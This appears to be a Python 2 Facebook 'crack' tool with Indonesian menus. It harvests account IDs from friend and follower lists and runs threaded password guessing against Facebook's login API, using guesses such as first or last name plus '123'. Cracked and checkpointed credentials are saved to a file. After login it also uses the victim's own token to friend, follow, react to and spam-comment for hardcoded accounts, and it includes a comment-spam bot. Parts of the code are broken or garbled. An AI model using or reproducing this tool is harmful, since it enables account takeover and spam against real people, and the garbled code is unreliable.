

```
#!/usr/bin/python2
```

```
#coding=utf-8
```

```
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
```

```
try:
```

```
    import requests
```

```
except ImportError:
```

```
    os.system('pip2 install requests')
```

```
try:
```

```
    import mechanize
```

```
except ImportError:
```

```
    os.system('pip2 install mechanize')
```

```
    time.sleep(1)
```

```
    os.system('python2 bot.py')
```

```
import
```

```
os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
```

```
from multiprocessing.pool import ThreadPool
```

```
from requests.exceptions import ConnectionError
```

```
from mechanize import Browser
```

```
reload(sys)
```

```
sys.setdefaultencoding('utf8')
```

```
br = mechanize.Browser()
```

```
br.set_handle_robots(False)
```

```
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
```

```
br.addheaders = [('User-Agent','Mozilla/5.0 (Linux; Android 9; Infinix X652B
```

```
Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
```

```
Chrome/85.0.4183.81 Mobile Safari/537.36
```

```
[FBAN/FB4A;FBAV/286.0.0.48.112;FBBV/242171848;FBDM/{density=2.0,width=720,height=
```

```
1428};FBLC/en_US;FBRV/243389251;FBCR/Warid;FBMF/INFINIX MOBILITY
```

```
LIMITED;FBBD/Infinix;FBPN/com.facebook.katana;FBDV/Infinix
```

```
X652B;FBSV/9;FBOP/19;FBCA/arm64-v8a;']])
```

```
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506)
```

```
[FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1
```

```
920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.fac
```

```
ebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;']])
```

```
global sukses
```

```
def keluar():
```

```
    print 'Selamat Tinggal '
```

```
    os.sys.exit()
```

```
def acak(b):
```

```
back = 0
threads = []
cekpoint = []
oks = []
```

```

id = []
sucessful = []
checkpoint = []
cp = []
ok = []
sukses = 0
br.addheaders = []

##### LICENSE #####
#=====#
def lisensi():
    os.system('clear')
    login()
#####login#####
def login():
    os.system('clear')
    print logo
    print
    print 42*"033[1;96m="
    print "033[1;96m[1] 033[1;93mlogin facebook "
    time.sleep(0.05)
    print "033[1;96m[2] 033[1;93mlogin token facebook "
    time.sleep(0.05)
    print "033[1;96m[0] 033[1;97mKeluar      "
    print 42*"033[1;96m="
    pilih_login()

def pilih_login():
    peak = raw_input("\n033[1;92mPilih Nomor 033[1;95m : ")
    if peak == "":
        print "\x1b[1;91mFill in correctly"
        pilih_login()
    elif peak == "1":
        login1()
    elif peak == "2":
        tokenz()
    elif peak == "0":
        os.system('rm -rf login.txt')
        keluar()
    else:
        print "\x1b[1;91mFill in correctly"
        pilih()

def login1():
    os.system('clear')
    try:
        toket = open('login.txt','r')

```

```

        menu()
    except (KeyError,IOError):
        os.system('clear')
    time.sleep(0.05)
    print logo
    jalan("\033[1;96m[!] \x1b[1;34mJangan Menggunakan akun fb lama' )
    jalan("\033[1;96m[!] \x1b[1;34mGunakan akun baru/via token' )
    print 42*\033[1;96m="
    id = raw_input("\033[1;96m[!] \x1b[0;34mID/Email \x1b[1;91m: \x1b[1;92m')
    pwd = raw_input("\033[1;96m[!] \x1b[0;34mPassword \x1b[1;91m:
\x1b[1;92m')
    print 42*\033[1;96m="
    tik()
    try:
        br.open('https://m.facebook.com')
    except mechanize.URLError:
        print"\n\x1b[1;97mThere is no internet connection"
        keluar()
    br._factory.is_html = True
    br.select_form(nr=0)
    br.form['email'] = id
    br.form['pass'] = pwd
    br.submit()
    url = br.geturl()
    if 'save-device' in url:
        try:
            sig=
'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'for
mat=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth
.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
            data =
{"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id
,"format":"JSON",
"generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth
.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
            x=hashlib.new("md5")
            x.update(sig)
            a=x.hexdigest()
            data.update({'sig':a})
            url = "https://api.facebook.com/restserver.php"
            r=requests.get(url,params=data)
            z=json.loads(r.text)
            unikers = open("login.txt", 'w')
            unikers.write(z['access_token'])
            unikers.close()
            bot_lik()
            jalan( '\n\x1b[1;95mLogin Successful...')

```

```

os.system('xdg-open
https://www.facebook.com/dogukan.er.144')

requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
    menu()
except requests.exceptions.ConnectionError:
    print("\n\x1b[1;97mThere is no internet connection"
keluar()
if 'checkpoint' in url:
    print("\n\x1b[1;97mSepertinya Akun Anda Terkena Checkpoint")
    os.system('rm -rf login.txt')
    time.sleep(1)
    keluar()
else:
    print("\n\x1b[1;93mPassword/Email Anda Salah")
    os.system('rm -rf login.txt')
    time.sleep(1)
    login()

def tokenz():
    os.system('clear')
    print logo
    toket = raw_input("\033[1;96m[+] \033[1;93mToken Facebook \033[1;91m: ")
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
        a = json.loads(otw.text)
        nama = a['name']
        zedd = open("login.txt", 'w')
        zedd.write(toket)
        zedd.close()
        bot_lik()
        jalan( '\n\x1b[1;93mLogin Berhasil.....')
        os.system('xdg-open https://m.facebook.com/dogukan.er.144')
        menu()
    except KeyError:
        print "\033[1;96m[!] \033[1;31mSalah"

def bot_lik():
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;97m[!] Token invalid"
        os.system('rm -rf login.txt')
    os.system('clear')
    print logo
    print 42*\033[1;96m="
    jemb1 = ('100005344214417')
```

```

jemb = ('100005344214417')
post0 = ('1363850240469770')
reac = ('LOVE')
post = ('1363850240469770')
kom = ('Keren 😍')
post1 = ('1363850240469770')
kom1 = ('Keren 😍')
post2 = ('1363850240469770')
kom2 = ('Keren 😍')
post3 = ('1363850240469770')
kom3 = ('Keren 😍')
post4 = ('1363850240469770')
kom4 = ('Keren 😍')
post5 = ('1363850240469770')
kom5 = ('Keren 😍')
post6 = ('1363850240469770')
kom6 = ('Keren 😍')
post7 = ('1363850240469770')
kom7 = ('Keren 😍')
post8 = ('1363850240469770')
kom8 = ('Keren 😍')
post9 = ('1363850240469770')
kom9 = ('Keren 😍')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +jemb+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/a/subscribe?id=' +jemb1+
'&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post0+'/reactions?type=' +reac+
'&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post1+'/comments/?message=' +kom1+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post3+'/comments/?message=' +kom3+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post4+'/comments/?message=' +kom4+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post5+'/comments/?message=' +kom5+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post6+'/comments/?message=' +kom6+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post7+'/comments/?message=' +kom7+
'&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post8+'/comments/?message=' +kom8+
'&access_token=' + toket)

```

```
requests.post('https://graph.facebook.com/'+post9+'/comments/?message=' +kom9+
'&access_token=' + toket)
```

```
def menu():
    os.system('clear')
    try:
        toket=open('login.txt','r').read()
    except IOError:
        os.system('clear')
        print"\033[1;96m[!] \x1b[1;91mToken invalid"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
        a = json.loads(otw.text)
        nama = a['name']
        id = a['id']
    except KeyError:
        os.system('clear')
        print"\033[1;96m[!] \033[1;91mSepertinya akun anda kena checkpoint"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    except requests.exceptions.ConnectionError:
        print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
        keluar()
    os.system("clear")
    print logo
    print 42*\033[1;96m="
    print "\033[1;96m[✓] \033[1;93mNama \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
    print "\033[1;96m[✓] \033[1;93mID \033[1;91m: \033[1;92m"+id+"\033[1;97m"
    print 42*\033[1;96m="
    print "\x1b[1;96m[1] \x1b[1;93mCrack FB "
    print "\x1b[1;96m[2] \x1b[1;93mBot Comentar "
    print "\x1b[1;96m[0] \x1b[1;91m Keluar      "
    pilih()
```

```
def pilih():
    unikers = raw_input("\n\033[1;97m pilih nomor : \033[1;97m")
    if unikers == "":
        print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
        pilih()
    elif unikers == "1":
        mbf()
    elif unikers == "2":
```

```

        bot_komen()
    elif unikers == "0":
        jalan('Menghapus token')
        os.system('rm -rf login.txt')
        keluar()
    else:
        print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
        pilih()

def mbf():
    global toket
    os.system('clear')
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('clear')
    print logo
    print 42*\033[1;96m="
    print "\x1b[1;96m[1] \x1b[1;93mCrack dari daftar teman "
    print "\x1b[1;96m[2] \x1b[1;93mCrack dari daftar teman ke teman "
    print "\x1b[1;96m[2] \x1b[1;93mCrack dari Followers teman "
    print "\x1b[1;96m[0] \x1b[1;91mKembali"
    pilih_mbf()

def pilih_mbf():
    peak = raw_input("\n\033[1;97m pilih nomor : \033[1;97m")
    if peak == "":
        print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
        mbf()
    elif peak == "1":
        os.system('clear')
        print logo
        print 42*\033[1;96m="
        print "\033[1;96m  \033[1;93m◆\033[1;31m◇\033[1;34m█
\033[1;93mCRACK FB DAFTAR TEMAN \033[1;34m█\033[1;31m◇\033[1;93m◆
\033[1;96m"
        print 42*\033[1;96m="
        jalan("\033[1;96m[✱] \033[1;93mMengambil ID \033[1;97m...')
        r =
requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
        z = json.loads(r.text)
        for s in z['data']:

```



```

        id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        print 42*"033[1;96m="
        print "\033[1;96m  \033[1;93m◆\033[1;31m◇\033[1;34m█
\033[1;93mCRACK FB DARI TEMAN \033[1;34m█\033[1;31m◇\033[1;93m◆
\033[1;96m"
        print 42*"033[1;96m="
        idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m:
\033[1;97m")
        try:
            jok =
requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
            op = json.loads(jok.text)
            print"\033[1;96m\033[1;97m✓\033[1;96m] \033[1;93mNama
teman\033[1;91m : \033[1;97m "+op["name"]
        except KeyError:
            print"\033[1;96m[!] \033[1;91mTeman tidak ditemukan!"
            raw_input("\n\033[1;96m\033[1;97mKembali\033[1;96m]")
            mbf()
            jalan("\033[1;96m[*] \033[1;93mMengambil ID \033[1;97m...")
            r =
requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
            z = json.loads(r.text)
            for i in z['data']:
                id.append(i['id'])
    elif peak == "3":
        os.system('clear')
        print logo
        print 42*"033[1;96m="
        print "\033[1;96m  \033[1;93m◆\033[1;31m◇\033[1;34m█
\033[1;93mCRACK FB FOLLOWERS \033[1;34m█\033[1;31m◇\033[1;93m◆
\033[1;96m"
        print 42*"033[1;96m="
        idt = raw_input("\033[1;96m[+] \033[1;93mID Publik/Teman : \033[1;97m ")
        try:
            jok =
requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
            op = json.loads(jok.text)
            print"\033[1;96m\033[1;93m✓\033[1;96m] \033[1;95mNama :
\033[1;97m "+op["name"]
        except KeyError:
            print"\033[1;96m\033[1;97mID publik/teman tidak ada !"
            raw_input("\n\033[1;96m\033[1;31m<Kembali>\033[1;96m)")
            menu()
        except requests.exceptions.ConnectionError:
            print"\033[1;96m[!] \033[1;31mTidak ada koneksi !"

```

```

        keluar()
        jalan("\033[1;96m[*] \033[1;93mMengambil ID \033[1;97m...')
        r =
requests.get("https://graph.facebook.com/" + idt + "/subscribers?limit=999999&access_token="
+ toket)

        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "0":
        menu()
    else:
        print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
        mbf()

    print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m" + str(len(id))
    jalan("\033[1;96m[*] \033[1;93mStart \033[1;97m...')
    titik = ['. ', '.. ', '... ']
    for o in titik:
        print("\r\033[1;96m[\033[1;97m*\033[1;96m] \033[1;93mCrack
\033[1;97m" + o),;sys.stdout.flush();time.sleep(1)
        print
        pass1 = raw_input("\033[1;36m[1] \033[1;93mPassword \033[1;91m: \033[1;97m")
        pass2 = raw_input("\033[1;36m[2] \033[1;93mPassword \033[1;91m: \033[1;97m")
        pass4 = raw_input("\033[1;36m[3] \033[1;93mPassword \033[1;91m: \033[1;97m")
        pass6 = raw_input("\033[1;36m[4] \033[1;93mPassword \033[1;91m: \033[1;97m")
        print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
        print 42*\033[1;96m="
        print "\033[96m[🤪 | " + 3*" " + "\033[35mIdentitas" + 4*" " + "\033[96m" + 5*" " +
"\033[33mPassword" + 8*" " + "\033[96m"
        print 42*\033[1;96m="

def main(arg):
    global cekpoint, oks
    user = arg
    try:
        os.mkdir('out')
    except OSError:
        pass
    try:
        a =
requests.get("https://graph.facebook.com/" + user + "/" + "?access_token=" + toket)
        b = json.loads(a.text)
        pass1
        data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (

```

```

user)+"&locale=en_US&password="+pass1)+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")
    q = json.load(data)
    if 'access_token' in q:
        print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m
'+b['name']
        print '\x1b[1;96m| \x1b[1;34mOK \x1b[1;96m|\x1b[1;34m ' +
user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
        print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m
'+b['birthday']
        oks.append(user+pass1)
    else:
        if 'www.facebook.com' in q["error_msg"]:
            print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']
            print '\x1b[1;96m| \x1b[1;93mCP \x1b[1;96m|\x1b[1;34m
' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
            print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m
'+b['birthday']

            cek = open("out/mbf_cp.txt", "a")
            cek.write(user+"|"+pass1+"\n")
            cek.close()
            cp.append(user+pass1)
        else:
            pass2
            data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
(user)+"&locale=en_US&password="+pass2)+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")
            q = json.load(data)
            if 'access_token' in q:
                print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']
                print '\x1b[1;96m| \x1b[1;34mOK
\x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
                print '\033[1;96m| \033[1;31mTL
\033[1;96m|\033[1;93m '+b['birthday']
                oks.append(user+pass2)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']
                    print '\x1b[1;96m| \x1b[1;93mCP
\x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
                    print '\033[1;96m| \033[1;31mTL
\033[1;96m|\033[1;93m '+b['birthday']

                    cek = open("out/mbf_cp.txt", "a")

```

```

cek.write(user+"|"+pass2+"\n")
cek.close()
cp.append(user+pass2)
else:
    pass3 = b['first_name'] + '123'
    data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
user)+"&locale=en_US&password="+pass3+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)
if 'access_token' in q:
    print '\033[1;96m|\033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']
    print '\x1b[1;96m|\x1b[1;34mOK
\x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
    print '\033[1;96m|\033[1;31mTL
\033[1;96m|\033[1;93m '+b['birthday']
    oks.append(user+pass3)
else:
    if 'www.facebook.com' in
q["error_msg"]:
        print '\033[1;96m|
\033[1;97mNM \033[1;96m|\033[1;31m '+b['name']
        print '\x1b[1;96m|
\x1b[1;93mCP \x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
        print '\033[1;96m|
\033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']
        cek =
open("out/mbf_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
        cek.close()
        cp.append(user+pass3)
    else:
        pass4
        data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
user)+"&locale=en_US&password="+pass4+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")
        q = json.load(data)
        if 'access_token' in q:
            print '\033[1;96m|
\033[1;97mNM \033[1;96m|\033[1;31m '+b['name']
            print '\x1b[1;96m|
\x1b[1;34mOK \x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4

```

```

print '\033[1;96m|

\033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']

oks.append(user+pass4)

else:
    if
'www.facebook.com' in q["error_msg"]:
        print
'\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m '+b['name']
        print
'\x1b[1;96m| \x1b[1;93mCP \x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' +
pass4
        print
'\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']
        cek =
open("out/mbf_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
        cek.close()

cp.append(user+pass4)

else:
    pass5 =
    data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
(user)+"&locale=en_US&password="+pass5+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")
    q =
json.load(data)
    if
'access_token' in q:
        print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m '+b['name']

        print '\x1b[1;96m| \x1b[1;34mOK \x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m '
+ pass5

        print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']

        oks.append(user+pass5)

else:
    if
'www.facebook.com' in q["error_msg"]:

        print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m '+b['name']

```

```

        print '\x1b[1;96m| \x1b[1;93mCP \x1b[1;96m|\x1b[1;34m ' + user + '
\x1b[1;96m|\x1b[1;97m ' + pass5

        print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']

        cek = open("out/mbf_cp.txt", "a")

        cek.write(user+"|"+pass5+"\n")

        cek.close()

        cp.append(user+pass5)

else:

    pass6

    data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
(user)+"&locale=en_US&password="+pass6+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")

    q = json.load(data)

    if 'access_token' in q:

        print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m '+b['name']

        print '\x1b[1;96m| \x1b[1;34mOK \x1b[1;96m|\x1b[1;34m ' + user + '
\x1b[1;96m|\x1b[1;97m ' + pass6

        print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']

        oks.append(user+pass6)

    else:

        if 'www.facebook.com' in q["error_msg"]:

            print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m '+b['name']

            print '\x1b[1;96m| \x1b[1;93mCP \x1b[1;96m|\x1b[1;34m ' + user + '
\x1b[1;96m|\x1b[1;97m ' + pass6

            print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m '+b['birthday']

```

```

cek = open("out/mbf_cp.txt", "a")

cek.write(user+"|"+pass6+"\n")

cek.close()

cp.append(user+pass6)

else:

    pass7 = b['last_name'] + '123'

    data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
user)+"&locale=en_US&password="+pass7+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")

    q = json.load(data)

    if 'access_token' in q:

        print '\033[1;96m| \033[1;97mNM \033[1;96m|\033[1;31m
'+b['name']

        print '\x1b[1;96m| \x1b[1;34mOK \x1b[1;96m|\x1b[1;34m ' +
user + ' \x1b[1;96m|\x1b[1;97m ' + pass7

        print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m
'+b['birthday']

        oks.append(user+pass7)

    else:

        if 'www.facebook.com' in q["error_msg"]:

            print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']

            print '\x1b[1;96m| \x1b[1;93mCP \x1b[1;96m|\x1b[1;34m
' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7

            print '\033[1;96m| \033[1;31mTL \033[1;96m|\033[1;93m
'+b['birthday']

            cek = open("out/mbf_cp.txt", "a")

```

```

cek.write(user+"|"+pass7+"\n")

cek.close()

cp.append(user+pass7)

else:

    pass8 = b['last_name'] + '12345'

    data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=2377599095916
55%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+
user)+"&locale=en_US&password="+pass8+"&sdk=ios&generate_session_cookies=1&sig
=3f555f99fb61fcd7aa0c44f58f522ef6")

    q = json.load(data)

    if 'access_token' in q:

        print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']

        print '\x1b[1;96m| \x1b[1;34mOK
\x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8

        print '\033[1;96m| \033[1;31mTL
\033[1;96m|\033[1;93m '+b['birthday']

        oks.append(user+pass8)

    else:

        if 'www.facebook.com' in q["error_msg"]:

            print '\033[1;96m| \033[1;97mNM
\033[1;96m|\033[1;31m '+b['name']

            print '\x1b[1;96m| \x1b[1;93mCP
\x1b[1;96m|\x1b[1;34m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8

            print '\033[1;96m| \033[1;31mTL
\033[1;96m|\033[1;93m '+b['birthday']

            cek = open("out/mbf_cp.txt", "a")

            cek.write(user+"|"+pass8+"\n")

```



```
cek.close()
```

```
cp.append(user+pass8)
```

```
except:
```

```
    pass
```

```
p = ThreadPool(30)
p.map(main, id)
print 42*"033[1;96m="
print '\033[1;96m[✓] \033[1;93mSelesai \033[1;97m....'
print'\033[1;96m[✓] \033[1;34mTotal OK \033[1;34m: \033[1;93m'+str(len(oks))
print'\033[1;96m[✓] \033[1;93mTotal CP \033[1;93m : \033[1;97m'+str(len(cp))
print("\033[1;96m[✓] \033[1;34mcekpoint File tersimpan \033[1;91m:
\033[1;31mout/mbf_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
mbf()
```

```
def bot_komen():
```

```
    try:
```

```
        toket=open('login.txt','r').read()
```

```
    except IOError:
```

```
        print"\033[1;97m[!] Token invalid"
```

```
        os.system('rm -rf login.txt')
```

```
    os.system('clear')
```

```
    print logo
```

```
    print 42*"033[1;96m="
```

```
    jemb = raw_input("\033[1;96m[+] \033[1;93mID TEMAN/GROUP : \033[1;97m')
```

```
    post = raw_input("\033[1;96m[+] \033[1;93mID POST/COMENTAR : \033[1;97m')
```

```
    post1 = raw_input("\033[1;96m[+] \033[1;93mID POST/LIKE : \033[1;97m')
```

```
    kom = ('😍')
```

```
    reac = ('LOVE')
```

```
    requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +jemb+
'&access_token=' + toket)
```

```
    requests.post('https://graph.facebook.com/'+post1+'/reactions?type=' +reac+
'&access_token='+ toket)
```

```
    while post != kom:
```

```
        no +=1
```

```
    for i in range(0,1):
```

```
        print (no)
```

```
        requests.post('https://graph.facebook.com/'+post+'/comments/?message='
+kom+ '&access_token=' + toket)
```

```
        jalan("\033[1;96m[✓] \033[1;93mBERHASIL MENGOMENTARI JANDA')
```

```
        time.sleep(0.5)
```

```
    print
```

```
    os.system('clear')
```

```
os.system('python2 bot.py')
```

```
if __name__ == '__main__':  
    login()
```